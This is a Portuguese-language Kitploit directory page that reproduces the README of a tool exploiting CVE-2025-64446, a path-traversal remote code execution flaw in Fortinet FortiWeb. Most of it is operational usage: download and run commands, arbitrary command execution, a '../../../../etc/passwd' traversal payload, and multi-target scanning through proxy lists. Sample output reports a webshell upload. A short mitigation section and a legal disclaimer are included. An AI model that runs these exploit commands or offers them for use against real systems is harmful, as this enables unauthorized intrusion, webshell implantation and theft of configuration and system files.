Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-64446-fortiweb-exploit — Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability) | Kitploit
Ferramentas/GitHubGitHub/an5i/cve-2025-64446-fortiweb-exploit
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
an5i/cve-2025-64446-fortiweb-exploit

cve-2025-64446-fortiweb-exploit

Ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-64446 (FortiWeb Path Traversal RCE vulnerability)

Ver Repositório
11há 9 mesesAinda não revisado

CVE-2025-64446 Exploit de RCE por Path Traversal no Fortinet FortiWeb

Uma ferramenta de pesquisa de segurança para detectar e testar a vulnerabilidade CVE-2025-64446 no Fortinet FortiWeb Web Application Firewall (WAF). Esta vulnerabilidade crítica de path traversal (dia zero) tem sido explorada ativamente na natureza e permite que atacantes não autenticados contornem os controles de segurança e executem código arbitrário.

⚠️ Aviso Legal

Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Use esta ferramenta apenas em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar.

📋 Visão Geral

CVE-2025-64446 é uma vulnerabilidade crítica de path traversal (dia zero) no Fortinet FortiWeb WAF que tem sido explorada ativamente na natureza. Esta vulnerabilidade permite que atacantes não autenticados contornem controles de segurança através de ataques de path traversal, potencialmente levando à execução remota de código, acesso a arquivos de configuração e comprometimento total do sistema.

Pontuação CVSS: 9.8 (Crítica)
Status: Explorado ativamente na natureza
CISA KEV: Adicionado ao catálogo de vulnerabilidades conhecidas exploradas
Patch: FG-IR-25-910
Produto Afetado: Fortinet FortiWeb WAF

🔍 Funcionalidades

  • Detecção Automática de FortiWeb: Identifica implantações do FortiWeb WAF
  • Teste de Path Traversal: Testa múltiplas variações de payload de path traversal
  • Confirmação de Vulnerabilidade: Verifica a vulnerabilidade CVE-2025-64446
  • Acesso a Arquivos de Configuração: Tenta ler arquivos de configuração do FortiWeb
  • Implantação de Webshell: Demonstra capacidade de upload de webshell
  • Execução de Comandos: Executa comandos arbitrários (para testes autorizados)
  • Suporte a Multithreading: Escaneia múltiplos alvos em paralelo
  • Suporte a Proxy: Ignora restrições de segurança adicionais
  • Exportação JSON: Resultados detalhados em formato JSON
  • Script POC Incluso: Demonstração simples de prova de conceito

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • pip (gerenciador de pacotes Python)

Instalação Rápida

root@kitploit:~
# Clone o repositório
git clone https://github.com/AN5I/cve-2025-64446-fortiweb-exploit.git
cd cve-2025-64446-fortiweb-exploit

# Instale as dependências
pip install -r requirements.txt

# Torne os scripts executáveis (opcional)
chmod +x cve_2025_64446_fortiweb_exploit.py
chmod +x cve_2025_64446_poc.py

Alternativa: Download Direto

root@kitploit:~
# Baixe os scripts
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_fortiweb_exploit.py
wget https://raw.githubusercontent.com/AN5I/cve-2025-64446-fortiweb-exploit/main/cve_2025_64446_poc.py

# Instale as dependências
pip install requests

🚀 Utilização

Uso Básico

root@kitploit:~
# Alvo único
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com

# Executar comando personalizado
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -c "whoami"

# Múltiplos alvos a partir de arquivo
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

# Com threading para varredura mais rápida
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -t 5

# Saída detalhada para depuração
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com -v

Usando Proxies

root@kitploit:~
# Proxy único
python3 cve_2025_64446_fortiweb_exploit.py -u http://target.com --proxy http://proxy:port

# Múltiplos proxies a partir de arquivo
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Script POC

root@kitploit:~
# Teste POC básico
python3 cve_2025_64446_poc.py -u http://target.com

# Testar arquivo específico
python3 cve_2025_64446_poc.py -u http://target.com -f etc/passwd

# Saída detalhada
python3 cve_2025_64446_poc.py -u http://target.com -v

Opções de Linha de Comando

root@kitploit:~
-u, --url          URL do alvo
-f, --file         Arquivo contendo URLs de alvos (um por linha)
-c, --command      Comando a executar (padrão: id)
-t, --threads      Número de threads (padrão: 1)
-o, --output       Arquivo de saída (padrão: uknf_fortiweb_results.json)
-v, --verbose      Ativar logging detalhado
--proxy            URL do proxy (ex.: http://127.0.0.1:8080)
--proxy-list       Arquivo contendo URLs de proxy (um por linha)

📊 Saída

O script gera um arquivo JSON com resultados detalhados:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-21T00:25:40.123456",
  "fortiweb_detected": true,
  "vulnerable": true,
  "path_traversal_successful": true,
  "config_file_read": true,
  "webshell_uploaded": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_payload": "../../../../etc/passwd"
}

🔬 Como Funciona

  1. Fase de Detecção: Escaneia indicadores do FortiWeb WAF (cabeçalhos, conteúdo, páginas de erro)
  2. Teste de Vulnerabilidade: Testa múltiplas variações de payload de path traversal
  3. Confirmação de Path Traversal: Verifica acesso bem-sucedido a arquivos
  4. Acesso à Configuração: Tenta ler arquivos de configuração do FortiWeb
  5. Exploração: Se vulnerável, demonstra capacidade de RCE através da implantação de webshell

🛡️ Mitigação

Se você usa o FortiWeb WAF:

  1. Aplique Atualizações de Segurança Imediatamente:

    root@kitploit:~
    # Verifique a versão atual
    show system status
    
    # Atualize para a versão mais recente
    execute upgrade <firmware-file>
    
    • Referência: FG-IR-25-910
  2. Segmentação de Rede:

    • Restrinja o acesso à interface de gerenciamento do FortiWeb
    • Implemente ACLs de rede
    • Use VPN para acesso administrativo
  3. Fortalecimento de Configuração:

    • Desative funcionalidades desnecessárias
    • Implemente controles de acesso rigorosos
    • Ative logging e monitoramento abrangentes
  4. Requisitos da CISA:

    • Agências federais devem aplicar patch em até 7 dias
    • Monitore o catálogo KEV da CISA para atualizações

📚 Referências

  • CVE: CVE-2025-64446
  • Fortinet PSIRT: FG-IR-25-910
  • Catálogo KEV da CISA: CVE-2025-64446
  • Blog da Tenable: Análise CVE-2025-64446

📖 Exemplos

Exemplo 1: Varredura de Alvo Único

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com

Exemplo 2: Múltiplos Alvos com Saída

root@kitploit:~
# Crie o arquivo de alvos
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Execute a varredura
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt -o results.json

Exemplo 3: Execução de Comando Personalizado

root@kitploit:~
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com -c "uname -a"

Exemplo 4: Usando Proxies

root@kitploit:~
# Proxy único
python3 cve_2025_64446_fortiweb_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Múltiplos proxies a partir de arquivo
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_64446_fortiweb_exploit.py -f targets.txt --proxy-list proxies.txt

Exemplo 5: Teste POC

root@kitploit:~
# POC básico
python3 cve_2025_64446_poc.py -u https://example.com

# Testar arquivo específico
python3 cve_2025_64446_poc.py -u https://example.com -f etc/passwd

🤝 Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Faça um fork do repositório
  2. Crie seu branch de funcionalidade (git checkout -b feature/AmazingFeature)
  3. Commit suas alterações (git commit -m 'Adicionar alguma AmazingFeature')
  4. Envie para o branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

🐛 Problemas

Se você encontrar algum problema ou tiver sugestões, por favor abra uma issue no GitHub.

📝 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma estrela no GitHub!

⚖️ Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado. Os autores não são responsáveis por qualquer uso indevido ou danos causados por este programa. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema.

🙏 Agradecimentos

  • Relator original da vulnerabilidade e pesquisadores de segurança
  • Fortinet PSIRT pela divulgação da vulnerabilidade
  • CISA por manter o catálogo KEV
  • Comunidade de segurança pela pesquisa contínua

💰 Doações

Se você achar esta ferramenta útil e quiser apoiar o projeto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Obrigado pelo seu apoio! 🙏

Baixar ferramenta